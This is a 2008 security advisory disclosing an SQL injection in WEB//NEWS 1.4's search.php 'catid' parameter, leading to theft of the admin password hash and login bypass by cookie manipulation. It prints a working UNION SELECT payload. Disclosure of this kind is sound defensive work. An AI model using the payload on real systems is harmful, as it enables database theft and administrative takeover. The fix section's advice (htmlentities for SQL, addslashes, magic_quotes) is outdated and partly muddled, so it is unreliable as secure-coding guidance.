webnews-sql.txt

`[HACKATTACK Advisory 20081016]WEB//NEWS SQL Injection and Cookie Manipulation  
  
Details  
=======  
Product: WEB//NEWS  
Security-Risk: high  
Remote-Exploit: yes  
Vendor-URL: http://www.stylemotion.de/  
Vendor-Status: informed  
Advisory-Status: published  
  
Credits  
============  
Discovered by: David Vieira-Kurz  
http://www.HACKATTACK.at / www.HACKATTACK.eu  
  
Affected Products:  
----------------------------  
WEB//NEWS 1.4 and prior  
  
Original Advisory:  
============  
http://www.HACKATTACK.at/  
  
Introduction  
============  
WEB//NEWS is an easy to handle news management system which works with MySQL/PHP.  
  
More Details  
============  
  
1. SQL Injection:  
---------------------  
Input passed to the "catid" parameter in "search.php" using $_POST is not properly sanitised before being used in a SQL query.  
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  
  
2. Cookie_Manipulation:  
---------------------  
After a successfull sql injection and getting the required administrator password hash, an attacker is able to bypass the  
login with the given information and to gain full administrative access on the news management system.  
  
1.1 PoC:  
============  
http://localhost/webnews/search.php?  
  
Postdata:  
1. an attacker have to input a keyword into the keyword textfield. This is required for successfull exploitation.  
  
2. An attacker will post the follwing sql statement to categorie id field:  
  
') union select 1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from wn_user where userid=1/**  
  
  
Solution  
=============  
  
Fix  
===  
Upgrade to newest version(1.4.1a)  
  
Solution  
=============  
Edit the source code to ensure that input is properly sanitised.  
You should work with "htmlspecialchars()" or "htmlentities()" php-function to ensure that html tags  
are not going to be executed. You should also work with the "mysql_real_escape_string()" or "addslashes()" php-function to ensure that sql statements  
can't be delivered over the "get" variables. Further it is recommend to set off the "register globals" option in the  
"php.ini" on your webserver. It's also possible to turn on magic_quotes.  
  
Example:  
$password = htmlentities($_POST['catid']);  
$file = htmlspecialchars($_GET['keyword']);  
$id = intval($_POST['id']);  
?>  
  
History/Timeline  
================  
22.09.2008 discovery of the vulnerabilities  
22.09.2008 additional tests with other versions  
24.09.2008 contacted the vendor  
15.10.2008 advisory is written  
16.10.2008 advisory released  
  
HACKATTACK  
================  
HACKATTACK IT SECURITY GmbH is an Austrian Penetrationtest and security Assesement company which focuses  
on web application security and firewall security.  
You can find more Information about HACKATTACK at  
http://www.HACKATTACK.at  
`